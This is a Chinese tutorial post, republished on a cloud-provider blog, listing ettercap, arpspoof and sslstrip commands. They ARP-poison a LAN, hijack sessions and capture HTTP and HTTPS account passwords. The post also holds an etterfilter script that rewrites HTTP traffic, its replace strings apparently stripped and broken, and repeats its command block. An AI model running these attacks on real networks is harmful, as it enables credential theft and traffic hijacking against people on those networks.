Loading [MathJax]/jax/output/CommonHTML/config.js
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >无线渗透之ettercap

无线渗透之ettercap

作者头像
墨文
发布于 2020-02-28 05:38:21
发布于 2020-02-28 05:38:21
1.2K00
代码可运行
举报
文章被收录于专栏:m0w3nm0w3n
运行总次数:0
代码可运行

无线渗透之ettercap

 ettercap命令查看

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
# ettercap -h

  ettercap渗透测试

# ettercap -Tzq 以命令行方式显示(-T),只嗅探本地数据包(-z),只显示捕捉到的用户名和密码以及其他信息(-q)。

# ettercap -T -M arp:remote /192.168.1.1// /192.168.1.2-10// 嗅探网关192.168.1.1与部分主机192.168.1.2-10之间相互通信的数据包。

# ettercap -Tzq ///110 只嗅探本机110端口pop3的信息。

# ettercap -Tzq /192.168.0.11//21,22,23 只嗅探本机与192.168.0.11主机在端口21、22、23上的通信。

# ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote /192.168.0.11/80 // 在eth0网卡上用自己的filter嗅探ip为192.168.0.11主机在80端口上的所有通信,并把所有的数据包保存成文件名为“sniffed_data”的文件。

# ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote /10.1.1.1/ /10.1.1.2/ 单向欺骗路由,只劫持路由发向10.1.1.2的数据包。

1.ARP欺骗之会话劫持:

ettercap -i eth0 -T -M arp:remote /10.0.0.1/ /// 欺骗局域网内所有主机 ettercap -i eth0 -T -M arp:remote /10.0.0.1/ /10.0.0.12//欺骗IP为10.0.0.12的主机

ettercap -i eth0 -Tq -M arp:remote /192.168.1.103/ /192.168.1.1/ 主要参数的意义如下:

-T:文本模式(-G是图形界面) -q:安静模式,不用每个包的数据都显示,嗅到密码显示就OK了

-M:方法,arp:remote(还有一种选择是桥接,这里就不试了)

//:是代表目标的写法,MAC地址/ip/端口 # ettercap -Tzq 以命令行方式显示,只嗅探本地数据包,只显示捕捉到的用户名和密码以及其他信息。

# ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.2-10/ 嗅探网关192.168.1.1与部分主机192.168.1.2-10之间相互通信的数据包。

# ettercap -Tzq //110 只嗅探本机110端口pop3的信息。

# ettercap -Tzq /192.168.1.11/21,22,23 只嗅探本机与192.168.1.11主机在端口21、22、23上的通信。

# ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote /192.168.1.11/80 // 在eth0网卡上用自己的filter嗅探ip为192.168.1.11主机在80端口上的所有通信,并把所有的数据包保存成文件名为“sniffed_data”的文件。

# ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote /192.168.1.1/ /192.168.1.2/ 单向欺骗路由,只劫持路由发向192.168.1.2的数据包。

1.ARP欺骗之会话劫持:

ettercap -i eth0 -T -M arp:remote /192.168.1.1/ // 欺骗局域网内所有主机 ettercap -i eth0 -T -M arp:remote /192.168.1.1/ /192.168.1.12/ 欺骗IP为192.168.1.12的主机 同时使用tcpdump抓包(当然也可以使用wireshark实时抓包并显示,但对本机压力比较大,建议使用tcpdump抓包,完成后再用wireshark显示): tcpdump -i eth0 2.编译自建规则 etterfilter -o test.ef test.filter 3 获取账号 arpspoof -i 网卡 -t 目标IP 网关 #断网攻击

HTTP账号密码获取:

命令:echo 1 > /proc/sys/net/ipv4/ip_forward # 写入 1 表示开启转发功能!

可以用cat查看修改:

命令:cat /proc/sys/net/ipv4/ip_forward # 显示1表示成功开启转发功能,0表示未开启

命令:arpspoof -i 网卡 -t 目标IP 网关 #开启欺骗

用ettercap抓取登入帐号,密码:

命令:ettercap -Tq -i 网关 # T表示文本模式,q表示安静模式

HTTPS账号密码获取: 先编辑下/etc/ettercap/etter.conf 命令:vim /etc/ettercap/etter.conf 找到 # if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

改为(去掉两个#): # if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

运行sslstrip -a -f -k 实现https转换成http以获取帐号密码

如果图形界面,可以用这个试试:driftnet -i wlan0 etter.filter.alert 脚本: if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { if (search(DATA.data, "")) { replace("",""); replace("",""); msg("injected ok!\n"); } }

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2018-11-05 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
Ettercap 实施中间人攻击 [实战篇]
中间人攻击(MITM)该攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到如今还具有极大的扩展空间,MITM攻击的使用是很广泛的,曾经猖獗一时的SMB会话劫持、DNS欺骗等技术都是典型的MITM攻击手段.在黑客技术越来越多的运用于以获取经济利益为目标的情况下时,MITM攻击成为对网银、网游、网上交易等最有威胁并且最具破坏性的一种攻击方式.
王瑞MVP
2022/12/28
1.7K0
ettercap 实施中间人攻击
中间人攻击(Man-in-the-MiddleAttack 简称"MITM攻击")中间人攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到如今还具有极大的扩展空间,在网络安全方面,MITM攻击的使用是很广泛的,曾经猖獗一时的SMB会话劫持、DNS欺骗等技术都是典型的MITM攻击手段.在黑客技术越来越多的运用于以获取经济利益为目标的情况下时,MITM攻击成为对网银、网游、网上交易等最有威胁并且最具破坏性的一种攻击方式.
王瑞MVP
2022/12/28
8830
SSL/TLS中间人arp劫持
(1)下面是利用ARP毒化,重定向受害者的流量传送给攻击者。(将攻击者插入目标与网关之间)
枪哥四海为家
2022/03/08
1.6K0
SSL/TLS中间人arp劫持
网络欺骗之Ettercap
Ettercap是Linux下一个强大的欺骗工具,刚开始只是作为一个网络嗅探器,但在开发过程中,它获得了越来越多的功能,在中间的攻击人方面,是一个强大而又灵活的工具。
字节脉搏实验室
2020/06/23
3.6K0
黑客玩具入门——6、网络嗅探
TCPDump是一款资深网络工作人员必备的工具。TCPDump是一款小巧的纯命令行工具,正是因为它的体积小巧,所以这款工具可以完美的运行在大多数路由器,防火墙以及Linux系统中。而且TCPDump现在有了Windows版本。
zaking
2023/12/02
6690
黑客玩具入门——6、网络嗅探
中间人攻击之dns劫持与ARP欺骗
(视不同环境而定,假设这里的路由器地址为 192.168.1.1) 也可利用其他工具查看其他主机,方法有很多
逍遥子大表哥
2021/12/17
1.3K0
[实战]如何在Kali Linux中进行WIFI钓鱼?
文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用! 0x00 实验环境 操作系统:Kali 1.0 (VM) FackAP: easy-creds 硬件:NETGEAR wg111 v3 RTL8187B 网卡(kali下免驱) 靶机:安卓、iPhone设备 0x01 环境搭建 git clone https://github.com/brav0hax/easy-creds cd easy-creds bash instal
用户1631416
2018/04/12
5.3K0
[实战]如何在Kali Linux中进行WIFI钓鱼?
ettercap获取http&https账号和密码
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
逍遥子大表哥
2021/12/17
2K0
ettercap获取http&https账号和密码
ARP欺骗与中间人攻击
在上一篇 WIFI密码破解笔记中说到如何探测附近开放的AP并且破解进入,那么进入别人据局域网我们能干些什么呢?换句话说如果别人进入了我们内部网络,会有什么影响?本文简要介绍了ARP和MITM原理,并在实际环境中对目标主机的流量进行劫持。可以看到公共网络中普遍存在许多不安全的问题,藉此来说说局域网中的客户端究竟面临着怎样的隐私泄漏和安全风险。
evilpan
2023/02/12
1.3K0
ettercap 局域网嗅探
本次嗅探试验所使用到的工具有两个,ettercap和driftnet。 ettercap是一款现有流行的网络抓包软件,他利用计算机在局域网内进行通信的ARP协议的缺陷进行攻击,在目标与服务器之间充当中间人,嗅探两者之间的数据流量,从中窃取用户的数据资料。
全栈程序员站长
2022/09/14
1.7K0
ettercap 局域网嗅探
利用中间人进行密码攻击
点击host-scan for hosts-host list扫描设备 点击目标主机添加为target1将路由设置为target2
逍遥子大表哥
2021/12/17
7290
利用中间人进行密码攻击
局域网下ARP欺骗以及DNS劫持
DNS又称为域名劫持 定义: 域名劫持是互联网攻击的一种方式,通过攻击域名解析服务器(DNS),或伪造域名解析服务器(DNS)的方法,把目标网站域名解析到错误的地址从而实现用户无法访问目标网站的目的。
菜菜有点菜
2022/03/16
3.1K0
局域网下ARP欺骗以及DNS劫持
ettercap做arp欺骗和dns欺骗—–详细教程
一年前玩过ettercap做arp欺骗和dns欺骗的实验,都忘记怎么操作的了,哈哈,现在重新整理下资料,方便小伙伴学习。
全栈程序员站长
2022/09/14
3.1K0
ettercap做arp欺骗和dns欺骗—–详细教程
Linux渗透之Ettercap详解「建议收藏」
Ettercap最初设计为交换网上的sniffer,但是随着发展,它获得了越来越多的功能,成为一款有效的、灵活的中介攻击工具。它支持主动及被动的协议解析并包含了许多网络和主机特性(如OS指纹等)分析。
全栈程序员站长
2022/09/14
2.4K0
细说中间人攻击(一)
在之前的ARP欺骗与中间人攻击讲到了MITM攻击的基础和原理,并且在实验中成功对网关和目标主机进行了ARP毒化,从而使得无论目标的外出数据或流入数据都会经过本机这个“中间人”。在后记里也略为提及到,中间人可以做的事情有很多,但是没有详细介绍。本文主要介绍了在ARP毒化和简单的DNS劫持情况下如何截获目标的会话和COOKIE等验证信息,以及如何对截获的会话进行简单修改。
evilpan
2023/02/12
1.1K0
细说中间人攻击(一)
Iptables防火墙规则使用梳理
iptables是组成Linux平台下的包过滤防火墙,与大多数的Linux软件一样,这个包过滤防火墙是免费的,它可以代替昂贵的商业防火墙解决方案,完成封包过滤、封包重定向和网络地址转换(NAT)等功能。在日常Linux运维工作中,经常会设置iptables防火墙规则,用来加固服务安全。以下对iptables的规则使用做了总结性梳理: iptables首先需要了解的: 1)规则概念 规则(rules)其实就是网络管理员预定义的条件,规则一般的定义为“如果数据包头符合这样的条件,就这样处理这个数据包”。规则存储
洗尽了浮华
2018/01/23
4.2K0
Iptables防火墙规则使用梳理
防火墙之地址转换SNAT DNAT
1、原理:在路由器后(PSOTROUTING)将内网的ip地址修改为外网网卡的ip地址。
拓荒者
2019/03/15
3.4K0
防火墙之地址转换SNAT DNAT
手把手教你DNS劫持挂马
他可以将网站的域名转换为ip地址。nternet 上的每个设备都被分配了一个 IP 地址,必须有该地址才能找到相应的 Internet 设备 - 就像使用街道地址来查找特定住所一样。当用户想要加载网页时,用户在 Web 浏览器中键入的内容(example.com)与查找 example.com 网页所需的机器友好地址之间必须进行转换。
Ms08067安全实验室
2021/03/16
4.3K0
手把手教你DNS劫持挂马
kali的Ettercap(0.8.3.1)GUI界面中文化[通俗易懂]
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/154173.html原文链接:https://javaforall.cn
全栈程序员站长
2022/09/14
1.8K0
kali的Ettercap(0.8.3.1)GUI界面中文化[通俗易懂]
Python 实现ARP扫描与欺骗
ARP欺骗又称ARP毒化或ARP攻击,是针对以太网地址解析协议ARP的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定计算机或所有计算机无法正常连线。
王瑞MVP
2022/12/28
1.5K0
Python 实现ARP扫描与欺骗
相关推荐
Ettercap 实施中间人攻击 [实战篇]
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档